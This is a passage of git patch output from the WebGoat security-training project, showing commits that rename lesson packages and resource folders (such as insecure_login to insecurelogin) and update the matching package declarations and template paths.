rename from src/main/resources/lessons/http_proxies/images/breakpoint2.png
rename to src/main/resources/lessons/httpproxies/images/breakpoint2.png
diff --git a/src/main/resources/lessons/http_proxies/images/burpfilter.png b/src/main/resources/lessons/httpproxies/images/burpfilter.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/burpfilter.png
rename to src/main/resources/lessons/httpproxies/images/burpfilter.png
diff --git a/src/main/resources/lessons/http_proxies/images/burpfilterclient.png b/src/main/resources/lessons/httpproxies/images/burpfilterclient.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/burpfilterclient.png
rename to src/main/resources/lessons/httpproxies/images/burpfilterclient.png
diff --git a/src/main/resources/lessons/http_proxies/images/burpintercept.png b/src/main/resources/lessons/httpproxies/images/burpintercept.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/burpintercept.png
rename to src/main/resources/lessons/httpproxies/images/burpintercept.png
diff --git a/src/main/resources/lessons/http_proxies/images/burpintercepted.png b/src/main/resources/lessons/httpproxies/images/burpintercepted.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/burpintercepted.png
rename to src/main/resources/lessons/httpproxies/images/burpintercepted.png
diff --git a/src/main/resources/lessons/http_proxies/images/burpproxy.png b/src/main/resources/lessons/httpproxies/images/burpproxy.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/burpproxy.png
rename to src/main/resources/lessons/httpproxies/images/burpproxy.png
diff --git a/src/main/resources/lessons/http_proxies/images/burpwarn.png b/src/main/resources/lessons/httpproxies/images/burpwarn.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/burpwarn.png
rename to src/main/resources/lessons/httpproxies/images/burpwarn.png
diff --git a/src/main/resources/lessons/http_proxies/images/chrome-manual-proxy-win.png b/src/main/resources/lessons/httpproxies/images/chrome-manual-proxy-win.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/chrome-manual-proxy-win.png
rename to src/main/resources/lessons/httpproxies/images/chrome-manual-proxy-win.png
diff --git a/src/main/resources/lessons/http_proxies/images/chrome-manual-proxy.png b/src/main/resources/lessons/httpproxies/images/chrome-manual-proxy.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/chrome-manual-proxy.png
rename to src/main/resources/lessons/httpproxies/images/chrome-manual-proxy.png
diff --git a/src/main/resources/lessons/http_proxies/images/firefox-proxy-config.png b/src/main/resources/lessons/httpproxies/images/firefox-proxy-config.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/firefox-proxy-config.png
rename to src/main/resources/lessons/httpproxies/images/firefox-proxy-config.png
diff --git a/src/main/resources/lessons/http_proxies/images/firefoxsettingscerts.png b/src/main/resources/lessons/httpproxies/images/firefoxsettingscerts.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/firefoxsettingscerts.png
rename to src/main/resources/lessons/httpproxies/images/firefoxsettingscerts.png
diff --git a/src/main/resources/lessons/http_proxies/images/importcerts.png b/src/main/resources/lessons/httpproxies/images/importcerts.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/importcerts.png
rename to src/main/resources/lessons/httpproxies/images/importcerts.png
diff --git a/src/main/resources/lessons/http_proxies/images/loginscreen.png b/src/main/resources/lessons/httpproxies/images/loginscreen.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/loginscreen.png
rename to src/main/resources/lessons/httpproxies/images/loginscreen.png
diff --git a/src/main/resources/lessons/http_proxies/images/newlocalhost.png b/src/main/resources/lessons/httpproxies/images/newlocalhost.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/newlocalhost.png
rename to src/main/resources/lessons/httpproxies/images/newlocalhost.png
diff --git a/src/main/resources/lessons/http_proxies/images/proxy-intercept-button.png b/src/main/resources/lessons/httpproxies/images/proxy-intercept-button.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/proxy-intercept-button.png
rename to src/main/resources/lessons/httpproxies/images/proxy-intercept-button.png
diff --git a/src/main/resources/lessons/http_proxies/images/proxy-intercept-details.png b/src/main/resources/lessons/httpproxies/images/proxy-intercept-details.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/proxy-intercept-details.png
rename to src/main/resources/lessons/httpproxies/images/proxy-intercept-details.png
diff --git a/src/main/resources/lessons/http_proxies/images/rootca.png b/src/main/resources/lessons/httpproxies/images/rootca.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/rootca.png
rename to src/main/resources/lessons/httpproxies/images/rootca.png
diff --git a/src/main/resources/lessons/http_proxies/images/savecerts.png b/src/main/resources/lessons/httpproxies/images/savecerts.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/savecerts.png
rename to src/main/resources/lessons/httpproxies/images/savecerts.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap-browser-button.png b/src/main/resources/lessons/httpproxies/images/zap-browser-button.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap-browser-button.png
rename to src/main/resources/lessons/httpproxies/images/zap-browser-button.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap-exclude.png b/src/main/resources/lessons/httpproxies/images/zap-exclude.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap-exclude.png
rename to src/main/resources/lessons/httpproxies/images/zap-exclude.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap-history.png b/src/main/resources/lessons/httpproxies/images/zap-history.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap-history.png
rename to src/main/resources/lessons/httpproxies/images/zap-history.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap-start.png b/src/main/resources/lessons/httpproxies/images/zap-start.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap-start.png
rename to src/main/resources/lessons/httpproxies/images/zap-start.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap_edit_and_resend.png b/src/main/resources/lessons/httpproxies/images/zap_edit_and_resend.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap_edit_and_resend.png
rename to src/main/resources/lessons/httpproxies/images/zap_edit_and_resend.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap_edit_and_response.png b/src/main/resources/lessons/httpproxies/images/zap_edit_and_response.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap_edit_and_response.png
rename to src/main/resources/lessons/httpproxies/images/zap_edit_and_response.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap_edit_and_send.png b/src/main/resources/lessons/httpproxies/images/zap_edit_and_send.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap_edit_and_send.png
rename to src/main/resources/lessons/httpproxies/images/zap_edit_and_send.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap_exclude.png b/src/main/resources/lessons/httpproxies/images/zap_exclude.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap_exclude.png
rename to src/main/resources/lessons/httpproxies/images/zap_exclude.png
diff --git a/src/main/resources/lessons/http_proxies/images/zap_exclude_url.png b/src/main/resources/lessons/httpproxies/images/zap_exclude_url.png
similarity index 100%
rename from src/main/resources/lessons/http_proxies/images/zap_exclude_url.png
rename to src/main/resources/lessons/httpproxies/images/zap_exclude_url.png
diff --git a/src/test/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequestTest.java b/src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequestTest.java
rename to src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java
index 5f12fac26..8cbc86bb7 100644
--- a/src/test/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequestTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/httpproxies/HttpBasicsInterceptRequestTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.http_proxies;
+package org.owasp.webgoat.lessons.httpproxies;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -28,7 +28,7 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.lessons.http_proxies.HttpBasicsInterceptRequest;
+import org.owasp.webgoat.lessons.httpproxies.HttpBasicsInterceptRequest;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 

From 26c289d7d46a4ddeb0f9aa6d475a32d03056f32a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:42:04 +0200
Subject: [PATCH 185/227] Renamed to insecurelogin

---
 .../{insecure_login => insecurelogin}/InsecureLogin.java      | 2 +-
 .../{insecure_login => insecurelogin}/InsecureLoginTask.java  | 2 +-
 .../documentation/InsecureLogin_Intro.adoc                    | 0
 .../documentation/InsecureLogin_Task.adoc                     | 0
 .../{insecure_login => insecurelogin}/html/InsecureLogin.html | 4 ++--
 .../i18n/WebGoatLabels.properties                             | 0
 .../{insecure_login => insecurelogin}/js/credentials.js       | 0
 7 files changed, 4 insertions(+), 4 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{insecure_login => insecurelogin}/InsecureLogin.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{insecure_login => insecurelogin}/InsecureLoginTask.java (97%)
 rename src/main/resources/lessons/{insecure_login => insecurelogin}/documentation/InsecureLogin_Intro.adoc (100%)
 rename src/main/resources/lessons/{insecure_login => insecurelogin}/documentation/InsecureLogin_Task.adoc (100%)
 rename src/main/resources/lessons/{insecure_login => insecurelogin}/html/InsecureLogin.html (93%)
 rename src/main/resources/lessons/{insecure_login => insecurelogin}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{insecure_login => insecurelogin}/js/credentials.js (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
rename to src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java
index e239a4f8c..dc04e2969 100644
--- a/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLogin.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.insecure_login;
+package org.owasp.webgoat.lessons.insecurelogin;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLoginTask.java b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLoginTask.java
rename to src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java
index d14f565c7..72faf5a6f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLoginTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecurelogin/InsecureLoginTask.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.insecure_login;
+package org.owasp.webgoat.lessons.insecurelogin;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Intro.adoc b/src/main/resources/lessons/insecurelogin/documentation/InsecureLogin_Intro.adoc
similarity index 100%
rename from src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Intro.adoc
rename to src/main/resources/lessons/insecurelogin/documentation/InsecureLogin_Intro.adoc
diff --git a/src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Task.adoc b/src/main/resources/lessons/insecurelogin/documentation/InsecureLogin_Task.adoc
similarity index 100%
rename from src/main/resources/lessons/insecure_login/documentation/InsecureLogin_Task.adoc
rename to src/main/resources/lessons/insecurelogin/documentation/InsecureLogin_Task.adoc
diff --git a/src/main/resources/lessons/insecure_login/html/InsecureLogin.html b/src/main/resources/lessons/insecurelogin/html/InsecureLogin.html
similarity index 93%
rename from src/main/resources/lessons/insecure_login/html/InsecureLogin.html
rename to src/main/resources/lessons/insecurelogin/html/InsecureLogin.html
index 1c34ab781..a150a2f1c 100755
--- a/src/main/resources/lessons/insecure_login/html/InsecureLogin.html
+++ b/src/main/resources/lessons/insecurelogin/html/InsecureLogin.html
@@ -6,12 +6,12 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/insecure_login/documentation/InsecureLogin_Intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/insecurelogin/documentation/InsecureLogin_Intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- stripped down without extra comments -->
-        <div class="adoc-content" th:replace="doc:lessons/insecure_login/documentation/InsecureLogin_Task.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/insecurelogin/documentation/InsecureLogin_Task.adoc"></div>
         <div class="attack-container">
             <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
             <script th:src="@{/lesson_js/credentials.js}"></script>
diff --git a/src/main/resources/lessons/insecure_login/i18n/WebGoatLabels.properties b/src/main/resources/lessons/insecurelogin/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/insecure_login/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/insecurelogin/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/insecure_login/js/credentials.js b/src/main/resources/lessons/insecurelogin/js/credentials.js
similarity index 100%
rename from src/main/resources/lessons/insecure_login/js/credentials.js
rename to src/main/resources/lessons/insecurelogin/js/credentials.js

From e0a0a80ad99a1941f1da595901edcdb83208414b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:51:33 +0200
Subject: [PATCH 186/227] Renamed to lessontemplate

---
 .../LessonTemplate.java                         |   2 +-
 .../SampleAttack.java                           |   2 +-
 .../migration/V2019_11_10_1__introduction.sql   |   0
 .../documentation/lesson-template-attack.adoc   |   0
 .../documentation/lesson-template-content.adoc  |   0
 .../documentation/lesson-template-database.adoc |   0
 .../documentation/lesson-template-glue.adoc     |   6 +++---
 .../documentation/lesson-template-intro.adoc    |   0
 .../lesson-template-lesson-class.adoc           |   0
 .../lesson-template-video-more.adoc             |   0
 .../documentation/lesson-template-video.adoc    |   0
 .../html/LessonTemplate.html                    |  16 ++++++++--------
 .../i18n/WebGoatLabels.properties               |   0
 .../images/firefox-proxy-config.png             | Bin
 .../js/idor.js                                  |   0
 .../video/sample-video.m4v                      | Bin
 16 files changed, 13 insertions(+), 13 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{lesson_template => lessontemplate}/LessonTemplate.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{lesson_template => lessontemplate}/SampleAttack.java (98%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/db/migration/V2019_11_10_1__introduction.sql (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-attack.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-content.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-database.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-glue.adoc (81%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-intro.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-lesson-class.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-video-more.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/documentation/lesson-template-video.adoc (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/html/LessonTemplate.html (89%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/images/firefox-proxy-config.png (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/js/idor.js (100%)
 rename src/main/resources/lessons/{lesson_template => lessontemplate}/video/sample-video.m4v (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/lesson_template/LessonTemplate.java b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/lesson_template/LessonTemplate.java
rename to src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java
index 100778bea..9d6024cb8 100644
--- a/src/main/java/org/owasp/webgoat/lessons/lesson_template/LessonTemplate.java
+++ b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/LessonTemplate.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.lesson_template;
+package org.owasp.webgoat.lessons.lessontemplate;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/lesson_template/SampleAttack.java b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/lesson_template/SampleAttack.java
rename to src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java
index ed92f6634..8bdfabd17 100644
--- a/src/main/java/org/owasp/webgoat/lessons/lesson_template/SampleAttack.java
+++ b/src/main/java/org/owasp/webgoat/lessons/lessontemplate/SampleAttack.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.lesson_template;
+package org.owasp.webgoat.lessons.lessontemplate;
 
 import lombok.AllArgsConstructor;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/resources/lessons/lesson_template/db/migration/V2019_11_10_1__introduction.sql b/src/main/resources/lessons/lessontemplate/db/migration/V2019_11_10_1__introduction.sql
similarity index 100%
rename from src/main/resources/lessons/lesson_template/db/migration/V2019_11_10_1__introduction.sql
rename to src/main/resources/lessons/lessontemplate/db/migration/V2019_11_10_1__introduction.sql
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-attack.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-attack.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-attack.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-attack.adoc
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-content.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-content.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-content.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-content.adoc
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-database.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-database.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-database.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-database.adoc
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-glue.adoc
similarity index 81%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-glue.adoc
index 150fc3d81..7fbddf68c 100644
--- a/src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc
+++ b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-glue.adoc
@@ -9,15 +9,15 @@ green when the user solves the assignment. To make this work we need to add:
 <html xmlns:th="http://www.thymeleaf.org">
 
   <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/
+    <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/
 lesson-template-intro.adoc"></div>
   </div>
   <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/
+    <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/
 lesson-template-content.adoc"></div>
   </div>
   <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/
+    <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/
 lesson-template-lesson-class.adoc"></div>
   </div>
 </html>
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-intro.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-intro.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-intro.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-intro.adoc
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-lesson-class.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-lesson-class.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-lesson-class.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-lesson-class.adoc
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-video-more.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-video-more.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-video-more.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-video-more.adoc
diff --git a/src/main/resources/lessons/lesson_template/documentation/lesson-template-video.adoc b/src/main/resources/lessons/lessontemplate/documentation/lesson-template-video.adoc
similarity index 100%
rename from src/main/resources/lessons/lesson_template/documentation/lesson-template-video.adoc
rename to src/main/resources/lessons/lessontemplate/documentation/lesson-template-video.adoc
diff --git a/src/main/resources/lessons/lesson_template/html/LessonTemplate.html b/src/main/resources/lessons/lessontemplate/html/LessonTemplate.html
similarity index 89%
rename from src/main/resources/lessons/lesson_template/html/LessonTemplate.html
rename to src/main/resources/lessons/lessontemplate/html/LessonTemplate.html
index 730b2e37b..9b1c7557a 100644
--- a/src/main/resources/lessons/lesson_template/html/LessonTemplate.html
+++ b/src/main/resources/lessons/lessontemplate/html/LessonTemplate.html
@@ -4,38 +4,38 @@
         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which go in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-intro.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-intro.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-content.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-content.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-video.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-video.adoc"></div>
         <!-- can use multiple adoc's in a page-wrapper if you want ... or not-->
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-video-more.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-video-more.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-lesson-class.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-lesson-class.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-glue.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-glue.adoc"></div>
     </div>
 
     <div class="lesson-page-wrapper">
         <!-- reuse the above lesson-page-wrapper block for each 'page' of content in your lesson -->
         <!-- include content here, or can be placed in another location. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-attack.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-attack.adoc"></div>
 
         <!-- WebGoat will automatically style and scaffold some functionality by using the div.attack-container as below -->
         <div class="attack-container">
@@ -71,7 +71,7 @@
         see other lessons for other more complex examples -->
 
     <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:lessons/lesson_template/documentation/lesson-template-database.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/lessontemplate/documentation/lesson-template-database.adoc"></div>
     </div>
 
 </html>
diff --git a/src/main/resources/lessons/lesson_template/i18n/WebGoatLabels.properties b/src/main/resources/lessons/lessontemplate/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/lesson_template/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/lessontemplate/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/lesson_template/images/firefox-proxy-config.png b/src/main/resources/lessons/lessontemplate/images/firefox-proxy-config.png
similarity index 100%
rename from src/main/resources/lessons/lesson_template/images/firefox-proxy-config.png
rename to src/main/resources/lessons/lessontemplate/images/firefox-proxy-config.png
diff --git a/src/main/resources/lessons/lesson_template/js/idor.js b/src/main/resources/lessons/lessontemplate/js/idor.js
similarity index 100%
rename from src/main/resources/lessons/lesson_template/js/idor.js
rename to src/main/resources/lessons/lessontemplate/js/idor.js
diff --git a/src/main/resources/lessons/lesson_template/video/sample-video.m4v b/src/main/resources/lessons/lessontemplate/video/sample-video.m4v
similarity index 100%
rename from src/main/resources/lessons/lesson_template/video/sample-video.m4v
rename to src/main/resources/lessons/lessontemplate/video/sample-video.m4v

From 4f911c64a15196f44aca602af1892202098af985 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 19:56:43 +0200
Subject: [PATCH 187/227] Renamed to missingac

---
 .../lessons/{missing_ac => missingac}/DisplayUser.java |  2 +-
 .../MissingAccessControlUserRepository.java            |  2 +-
 .../{missing_ac => missingac}/MissingFunctionAC.java   |  2 +-
 .../MissingFunctionACHiddenMenus.java                  |  2 +-
 .../MissingFunctionACUsers.java                        |  8 ++++----
 .../MissingFunctionACYourHash.java                     |  7 ++++---
 .../MissingFunctionACYourHashAdmin.java                |  6 +++---
 .../lessons/{missing_ac => missingac}/User.java        |  2 +-
 .../lessons/{missing_ac => missingac}/css/ac.css       |  0
 .../db/migration/V2021_11_03_1__ac.sql                 |  0
 .../documentation/missing-function-ac-01-intro.adoc    |  0
 .../missing-function-ac-02-client-controls.adoc        |  0
 .../documentation/missing-function-ac-03-users.adoc    |  0
 .../missing-function-ac-04-users-fixed.adoc            |  0
 .../html/MissingFunctionAC.html                        |  8 ++++----
 .../i18n/WebGoatLabels.properties                      |  0
 .../{missing_ac => missingac}/DisplayUserTest.java     | 10 +++++-----
 .../MissingFunctionACHiddenMenusTest.java              |  3 ++-
 .../MissingFunctionACUsersTest.java                    |  4 ++--
 .../MissingFunctionACYourHashAdminTest.java            | 10 +++++-----
 .../MissingFunctionYourHashTest.java                   |  4 ++--
 21 files changed, 36 insertions(+), 34 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/DisplayUser.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingAccessControlUserRepository.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionAC.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACHiddenMenus.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACUsers.java (94%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACYourHash.java (94%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/MissingFunctionACYourHashAdmin.java (95%)
 rename src/main/java/org/owasp/webgoat/lessons/{missing_ac => missingac}/User.java (84%)
 rename src/main/resources/lessons/{missing_ac => missingac}/css/ac.css (100%)
